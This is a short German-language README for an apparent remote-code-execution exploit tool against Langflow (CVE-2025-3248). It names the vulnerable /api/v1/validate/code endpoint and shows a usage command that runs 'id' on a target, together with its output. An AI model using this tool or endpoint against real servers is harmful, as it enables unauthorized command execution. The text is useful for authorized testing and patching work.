
CVE-2025-3248 Langflow RCE-Exploit
Remote-Code-Execution-Exploit (RCE) für Langflow-Anwendungen, die anfällig für CVE-2025-3248 sind.
Betroffener Endpunkt:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec() in einem benutzerkontrollierten Codepfadapp="Langflow"
Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Die unbefugte Nutzung ist untersagt.